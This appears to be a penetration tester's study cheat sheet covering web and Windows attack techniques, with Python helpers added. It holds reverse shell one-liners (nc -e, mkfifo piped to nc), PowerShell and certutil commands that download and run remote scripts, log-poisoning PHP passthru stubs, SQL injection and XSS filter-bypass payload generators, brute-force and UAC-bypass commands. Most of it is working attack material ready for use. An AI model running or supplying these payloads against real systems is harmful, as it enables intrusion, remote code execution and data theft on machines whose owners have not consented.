Methods

RCE

  • command injection: append ; or | (also &&, ||, a newline, $(...) or backticks) to a value that reaches a shell so your command runs after the intended one


LFI

  • traverse directories: ../../../../etc/passwd, URL-encoded (%2e%2e%2f) if a plain ../ is filtered

  • /proc/self/environ (log poisoning): get PHP into a file the web server can read, then include that file

    • the same trick works on other log files, e.g. the access log (User-Agent lands there) or /var/log/auth.log (failed ssh usernames land there)

    • send the PHP stub with the command base64-encoded and let base64_decode() unpack it server-side, so quotes, pipes and spaces never hit the log line

    • ssh '[payload]'@[hostip] writes the payload into auth.log as the failed username

    • payload would be something like <?php passthru(base64_decode('[b64encoded string]')); ?>

  • use Burp to put the payload in a request header (User-Agent, Referer) before it is sent

  • reverse shell: nc -e /bin/sh [ip] [port]

    • start the listener first: nc -lvnp [port]

    • many nc builds lack -e; fall back to rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f

  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
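The log-poisoning steps above, as one added example (not from the original notes): build the base64-wrapped passthru stub, prepare the poisoning request and the LFI request as a dry run, and cut the command output back out of the included page. The parameter name page, the index.php path, the host name and the __LFI_OUT__ marker are assumptions.

```python
import base64
import re
from typing import Optional
from urllib.parse import quote, urlencode

# Added example (not from the original notes). The parameter name "page",
# the host name, the path to index.php and the MARK delimiter are assumptions.

MARK = "__LFI_OUT__"   # constructed delimiter used to cut the command output out of the page


def php_passthru_payload(cmd: str) -> str:
    """PHP stub to plant in the log / environ. The shell command is wrapped in
    marker echoes and base64-encoded so quotes, pipes and spaces never appear
    in the log line; PHP decodes and runs it when the file is include()d."""
    wrapped = f"echo {MARK}; {cmd}; echo {MARK}"
    b64 = base64.b64encode(wrapped.encode()).decode()
    return f"<?php passthru(base64_decode('{b64}')); ?>"


def decode_stub(stub: str) -> str:
    """Inverse of php_passthru_payload: recover the shell command a captured
    stub would execute (handy when checking what actually landed in the log)."""
    m = re.search(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", stub)
    if not m:
        raise ValueError("not a passthru/base64 stub")
    return base64.b64decode(m.group(1)).decode()


def traversal_path(target: str, depth: int = 8) -> str:
    """'../' prefix for an include() rooted somewhere below /; extra '../' are harmless."""
    return "../" * depth + target.lstrip("/")


def poison_requests(host: str, cmd: str, param: str = "page",
                    logfile: str = "/proc/self/environ") -> tuple:
    """Dry run: return the two requests as dicts instead of sending them.
    1) the request whose User-Agent carries the stub (it ends up in environ or
       in the access log), 2) the LFI request that includes that file."""
    poison = {"url": f"http://{host}/",
              "headers": {"User-Agent": php_passthru_payload(cmd)}}
    include = {"url": f"http://{host}/index.php?"
                      + urlencode({param: traversal_path(logfile)}, safe="/", quote_via=quote),
               "headers": {"User-Agent": "Mozilla/5.0"}}
    return poison, include


def extract_output(body: str) -> Optional[str]:
    """Cut the command output out of the included page using the markers."""
    m = re.search(re.escape(MARK) + r"\s*(.*?)\s*" + re.escape(MARK), body, re.S)
    return m.group(1) if m else None
```

Send the first dict with any HTTP client, then the second; the User-Agent of the second request must be clean or the stub gets included twice. The markers matter because the command output is buried in the rest of the log when it is echoed back.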


RFI

  • host a .txt file with the PHP payload on a web server on a machine you control that the target can reach (e.g. attacking the Windows VM from the Kali VM: serve the file from Kali)

    • pass the file's URL to the LFI parameter instead of a local path; it is pulled and executed as PHP (needs allow_url_include on)

    • append ? to the URL so anything the app tacks on (e.g. .php) ends up in the query string instead of the path

    • changing the case of the scheme (HtTp://) bypasses some naive filters


File uploads

  • change the MIME type (Content-Type of the multipart part)

  • change the file extension (.php5, .phtml, .php.jpg, double extensions)

  • add magic bytes at the start of the file (e.g. GIF89a;) so content-sniffing checks see an image


SQL Injection

  • in forms:

    • with a known-valid login, put pass' and 1=1# in the password field: if the login still works the input reaches the query unescaped (pass' and 1=2# should then fail)

    • with a valid username and unknown password, anything' OR 1=1# in the password field

    • or use only the username field if you know a good username: admin'# comments out the password check

    • client-side checks are not a barrier: remove the onsubmit handler in the DOM, or let good data through and modify it in Burp before it is sent to include the SQLi

  • in get params:

    • try order by 1#, order by 2#, ...; you may have to URL-encode # as %23

    • increment until the page errors: the last n that worked is the column count, then union select 1,2,3,...,n%23 to see which columns are rendered

    • union select 1,table_name,null,null,...,n from information_schema.tables where table_schema=database()%23

    • then column_name from information_schema.columns where table_name='...', then the data from that table

  • to bypass some filtering, write strings as MySQL hex literals (0x7573657273 instead of 'users', no quotes needed) and URL-encode everything before sending

  • sometimes changing the parameter order or the keyword case will bypass filters as well

  • when the page shows one record at a time, iterate in SQL to get everything

      • limit 0,1 then limit 1,1, limit 2,1, etc., or group_concat(table_name) to pull all rows in one go

  • reading files: union select load_file('/etc/passwd'),2 # (needs the FILE privilege)

  • write to file: union select 'test text',null into outfile '/var/www/output.txt'#

    • needs FILE, a directory mysqld can write to, and secure_file_priv may forbid it; as a workaround write to /tmp with the injection and read the file via LFI (or via RFI if separate machines have different vulns)

  • Tools

    • sqlmap

      • sqlmap -r [filename].req --level 4 --risk 3 (-r replays a saved request, e.g. copied from Burp)
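The GET-parameter enumeration and filter-bypass steps above, as one added example (not from the original notes): ORDER BY probing to find the column count, UNION SELECT with the echoed column chosen, information_schema enumeration with LIMIT iteration, hex literals instead of quoted strings, load_file()/INTO OUTFILE, and full URL-encoding. The -1 prefix, the column positions and the hypothetical errors callback are assumptions.

```python
from typing import Callable, Optional
from urllib.parse import quote

# Added example (not from the original notes). The "1"/"-1" prefixes, the
# column choices and the `errors` callback are assumptions.


def order_by_probe(n: int, prefix: str = "1") -> str:
    """n-th ORDER BY probe; '#' comments out the rest of the original query."""
    return f"{prefix} order by {n}#"


def find_column_count(errors: Callable[[str], bool], max_cols: int = 50) -> Optional[int]:
    """Increment ORDER BY n until the page errors. The last n that did not error
    is the column count the UNION must match. `errors(payload)` is whatever
    sends the payload and reports whether an error came back (hypothetical)."""
    for n in range(1, max_cols + 1):
        if errors(order_by_probe(n)):
            return n - 1 if n > 1 else None
    return None


def union_select(ncols: int, visible_col: int, expr: str,
                 from_clause: str = "", prefix: str = "-1") -> str:
    """UNION SELECT with `expr` in the column that is echoed back and the
    column numbers elsewhere, so the rendered number tells you which is visible.
    prefix -1 makes the original row vanish so only the injected row shows."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[visible_col - 1] = expr
    tail = f" {from_clause}" if from_clause else ""
    return f"{prefix} union select {','.join(cols)}{tail}#"


def to_hex_literal(s: str) -> str:
    """MySQL hex literal: 0x7573657273 compares equal to 'users' but needs no
    quotes, which gets past filters that strip or escape quote characters."""
    return "0x" + s.encode().hex()


def table_names(ncols: int, visible_col: int, row: int) -> str:
    """Row `row` of the table list; increment `row` for LIMIT row,1 iteration."""
    return union_select(ncols, visible_col, "table_name",
                        f"from information_schema.tables where table_schema=database() limit {row},1")


def column_names(ncols: int, visible_col: int, table: str) -> str:
    """All columns of one table in a single row via group_concat; the table
    name goes in as a hex literal so no quotes are needed."""
    return union_select(ncols, visible_col, "group_concat(column_name)",
                        f"from information_schema.columns where table_name={to_hex_literal(table)}")


def read_file(ncols: int, visible_col: int, path: str) -> str:
    """load_file() needs the FILE privilege; the path is a hex literal, again quote-free."""
    return union_select(ncols, visible_col, f"load_file({to_hex_literal(path)})")


def write_file(ncols: int, content: str, path: str) -> str:
    """INTO OUTFILE also needs FILE and a directory mysqld may write to
    (secure_file_priv can forbid it entirely)."""
    cols = [to_hex_literal(content)] + ["null"] * (ncols - 1)
    return f"-1 union select {','.join(cols)} into outfile '{path}'#"


def get_param(payload: str) -> str:
    """URL-encode everything for a GET parameter: spaces -> %20, '#' -> %23."""
    return quote(payload, safe="")
```

Plug find_column_count into whatever sends requests for you (return True when the response looks like the error page), then feed the result to union_select; the hex literals work for MySQL/MariaDB, other engines need their own quoting tricks.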


XSS

  • more info from python course

  • url params and input boxes

  • <script>alert('1')</script>

  • changing case (<ScRiPt>) often fools case-sensitive filters; tag names are case-insensitive to the browser

  • look at page source to see how code is being output and modify accordingly

  • URL-encoding the payload (or parts of it) is almost always helpful

  • always try to modify the DOM (remove inline methods, remove maxlength attributes, etc)

  • when quotes are filtered, build strings from their character codes with String.fromCharCode(...) instead of using quotes
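The three encodings the XSS notes above rely on, as an added example (not from the original notes): the String.fromCharCode form for quote-free payloads, alternating case for case-sensitive filters, and full percent-encoding. The sample payloads are constructed.

```python
from typing import Iterable

# Added example (not from the original notes); the sample payloads are constructed.


def from_char_code(js: str) -> str:
    """Rebuild a JS string from its character codes so the payload carries no
    quote characters: "XSS" -> String.fromCharCode(88,83,83)."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + ")"


def quoteless_alert(text: str) -> str:
    """alert() whose argument is built by from_char_code (no quotes anywhere)."""
    return f"alert({from_char_code(text)})"


def alternate_case(markup: str) -> str:
    """Flip the case of every other letter (<ScRiPt>) for case-sensitive
    blacklists; HTML tag and attribute names are case-insensitive."""
    out, upper = [], True
    for ch in markup:
        if ch.isalpha():
            out.append(ch.upper() if upper else ch.lower())
            upper = not upper
        else:
            out.append(ch)
    return "".join(out)


def url_encode_all(payload: str) -> str:
    """Percent-encode every byte, not just the reserved ones, for parameters
    that are decoded before being reflected."""
    return "".join(f"%{b:02X}" for b in payload.encode())


def variants(payload: str) -> Iterable[str]:
    """The transformations above applied to one payload, in the order you
    would usually try them."""
    yield payload
    yield alternate_case(payload)
    yield url_encode_all(payload)
    yield url_encode_all(alternate_case(payload))
```

Check the page source after each attempt: whether the payload lands inside an attribute, a script block or plain HTML decides which variant can actually run.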


Cookies

  • simple cookies (uid=1, role=user, admin=false) can be edited to impersonate another user or role


CSRF

  • host a hidden copy of the target form (same action and field names) that submits itself from JavaScript on page load; works when the browser attaches the session cookie automatically and there is no anti-CSRF token or SameSite protection


Creating Wordlists

  • crunch: crunch [min] [max] [chars] -t [pattern] -o [filename]

  • with -t, min and max must equal the pattern length, so: crunch 6 6 '123abc$' -t a@@@@b -o wordlist gives 6-char words that start with a, end with b, and fill the four @ slots from 1,2,3,a,b,c,$
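A Python stand-in for crunch's -t patterns, added here as an example (not from the original notes and not crunch's own code): @ draws from the charset you pass, while the other placeholders use crunch's default sets, which are approximated here (the symbol set in particular is an assumed subset).

```python
import itertools
from typing import Iterator

# Added example (not from the original notes): a Python stand-in for crunch's
# -t placeholders. Only '@' uses the charset you pass in; the other sets are
# approximations of crunch's defaults, the symbol set is an assumed subset.

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SYMBOLS = "!@#$%^&*()-_+="

PLACEHOLDERS = {"@": None, ",": UPPER, "%": DIGITS, "^": SYMBOLS}   # None -> caller's charset


def pattern_words(pattern: str, charset: str = LOWER) -> Iterator[str]:
    """Expand a crunch-style pattern: '@' takes one character from `charset`,
    ',' an uppercase letter, '%' a digit, '^' a symbol; anything else is literal.
    'a@@@@b' with charset '123abc$' yields 7**4 = 2401 words, a1111b first."""
    slots = []
    for ch in pattern:
        if ch in PLACEHOLDERS:
            slots.append(PLACEHOLDERS[ch] or charset)
        else:
            slots.append(ch)          # a one-character string is a fixed slot
    for combo in itertools.product(*slots):
        yield "".join(combo)


def count_words(pattern: str, charset: str = LOWER) -> int:
    """Size of the list without generating it (sanity check before writing it)."""
    n = 1
    for ch in pattern:
        if ch in PLACEHOLDERS:
            n *= len(PLACEHOLDERS[ch] or charset)
    return n


def write_wordlist(pattern: str, charset: str, path: str) -> int:
    """Stream the list to disk (what crunch -o does); returns the word count."""
    written = 0
    with open(path, "w") as fh:
        for word in pattern_words(pattern, charset):
            fh.write(word + "\n")
            written += 1
    return written
```

Run count_words first: a pattern with a few more placeholders than you meant produces a list that will not fit on disk, which crunch only tells you after it has started.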


encrypted cookies

  • CBC-encrypted cookies can sometimes be decrypted or forged with padbuster when the app leaks padding errors (padding oracle)


Brute forcing

  • Hydra

    • hydra [hostIP] -l [login] | -L [loginfile] -p [pass] | -P [passfile] | -C [user:pass file] [service] (one of -l/-L, one of -p/-P, or -C alone)

    • for a web form the service is http-post-form with the target string "/path-to-form.ext:[userparam]=^USER^&[passparam]=^PASS^&other-param=value:F=Not Logged In string"; F= is the failure string, S= a success string works too


ZAP

  • automated scanning, but more manual than many of the tools

  • all alerts from the scans can be reviewed afterwards


hashcat

  • hashcat --example-hashes

  • LUKS encrypted disk images

    • cryptsetup luksDump [imgfile] and read "Payload offset" (in 512-byte sectors); you need that value + 1 sectors

    • dd if=[imgfile] of=[outfile] bs=512 count=[offset+1] (header, key slots and the first payload sector)

    • hashcat -m 14600 [outfile] [wordlist] (LUKS1 only)
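The luksDump + dd step above, as an added example (not from the original notes): parse the LUKS1 header directly to read the payload offset, refuse LUKS2 up front (14600 expects LUKS1), and carve exactly offset+1 sectors. The on-disk field positions are those of the LUKS1 header format; the image built by fake_luks1_image() is constructed, not a real volume.

```python
import struct

# Added example (not from the original notes). Field offsets follow the LUKS1
# header format; fake_luks1_image() builds a constructed image for testing.

LUKS_MAGIC = b"LUKS\xba\xbe"
SECTOR = 512


def luks1_header_info(hdr: bytes) -> dict:
    """Parse the LUKS1 phdr fields that matter here: magic at 0, version
    (big-endian u16) at 6, cipher name at 8, cipher mode at 40, hash spec at 72,
    payload offset in sectors (big-endian u32) at 104."""
    if hdr[:6] != LUKS_MAGIC:
        raise ValueError("no LUKS magic: not a LUKS volume")
    version = struct.unpack_from(">H", hdr, 6)[0]
    if version != 1:
        raise ValueError(f"LUKS{version} header: hashcat -m 14600 handles LUKS1 only")

    def field(off: int, size: int) -> str:
        return hdr[off:off + size].split(b"\0", 1)[0].decode()

    return {
        "cipher": field(8, 32),
        "mode": field(40, 32),
        "hash": field(72, 32),
        "payload_offset": struct.unpack_from(">I", hdr, 104)[0],
    }


def carve_for_hashcat(image: bytes) -> bytes:
    """Same bytes as dd ... bs=512 count=[payload offset + 1]: header, key
    slots and the first payload sector, which hashcat uses to verify a key."""
    info = luks1_header_info(image[:SECTOR])
    n = (info["payload_offset"] + 1) * SECTOR
    if len(image) < n:
        raise ValueError("image shorter than header + first payload sector")
    return image[:n]


def carve_file(src: str, dst: str) -> int:
    """Carve from a real image without reading the whole thing into memory."""
    with open(src, "rb") as fh:
        info = luks1_header_info(fh.read(SECTOR))
        n = (info["payload_offset"] + 1) * SECTOR
        fh.seek(0)
        data = fh.read(n)
    if len(data) < n:
        raise ValueError("image shorter than header + first payload sector")
    with open(dst, "wb") as out:
        out.write(data)
    return n


def fake_luks1_image(payload_offset: int = 4096, sectors: int = 4200) -> bytes:
    """Constructed image with a minimal but well-formed LUKS1 phdr (not encrypted data)."""
    hdr = bytearray(SECTOR)
    hdr[0:6] = LUKS_MAGIC
    struct.pack_into(">H", hdr, 6, 1)
    hdr[8:15] = b"aes\0\0\0\0"
    hdr[40:54] = b"xts-plain64\0\0\0"
    hdr[72:79] = b"sha256\0"
    struct.pack_into(">I", hdr, 104, payload_offset)
    return bytes(hdr) + b"\0" * (sectors * SECTOR - SECTOR)


if __name__ == "__main__":
    import sys
    print(carve_file(sys.argv[1], sys.argv[2]), "bytes written")
```

Usage: python3 carve.py backup.img header.luks, then hashcat -m 14600 header.luks wordlist. Carving too few sectors is the usual reason hashcat rejects the file, hence the explicit length check.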


mounting LUKS disk image

  • cryptsetup luksOpen backup.img [name] (prompts for the passphrase hashcat recovered)

  • ls /dev/mapper

  • mount /dev/mapper/[name] /mnt

  • when done: umount /mnt; cryptsetup luksClose [name]


PowerShell

  • typing powershell in a cmd shell switches to PowerShell

  • Downloading files:

    • IEX(New-Object Net.WebClient).downloadString('http://[host]/[file]') downloads and runs the script in memory (IEX = Invoke-Expression)

    • (New-Object Net.WebClient).downloadString('http://[host]/[file]') only fetches it and returns the content as a string

    • Invoke-WebRequest -Uri http://[host]/[file]

      • IWR -Uri http://[host]/[file] also works

      • -OutFile C:\windows\temp\filename.ext to save it under that name

    • from a cmd shell, prefix with powershell -c "..."

  • listing all files:

    • gci -recurse . | select fullname

  • copy binary file to b64 string for rebuilding:

    • certutil -encode [filepath] [outfile path].b64

    • type [outfile path].b64

    • copy, paste to a file on your host

    • certutil wraps the output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines; strip them before decoding:

      • grep -v CERTIFICATE [filename].b64 | base64 -d > [filename].ext

  • creating credentials from string

    • $pass = ConvertTo-SecureString '[pass]' -AsPlainText -Force

    • $cred = New-Object System.Management.Automation.PSCredential("[user]",$pass)

    • hostname (to get the name for -ComputerName)

    • Invoke-Command -ComputerName [hostname] -ScriptBlock { whoami } -Credential $cred (needs WinRM reachable on the target)

      • run another IWR / IEX download inside the script block to get a shell as that user

  • useful to use rlwrap on your listener:

    • rlwrap nc -lvnp 9001 - this will give history up arrow, ctrl L to clear, etc.

  • bypass the UAC-filtered token if the account is in the Administrators group

    • net use Z: \\127.0.0.1\c$

    • z:

    • reliable for the built-in Administrator and for domain accounts; local admin accounts stay filtered over the network unless LocalAccountTokenFilterPolicy is set

  • UACME (hfiref0x) collects known UAC bypass techniques


CMD

  • download a file

    • certutil -urlcache -split -f http://[host]/[file] [outfile path] (well known to AV/EDR, expect it to be flagged)


TheHarvester: OSINT on a domain (emails, subdomains, hosts) from public sources

whatweb: fingerprints web technologies from the command line

wappalyzer: browser extension that does the same while you browse

pownjs: Pown.js security toolkit
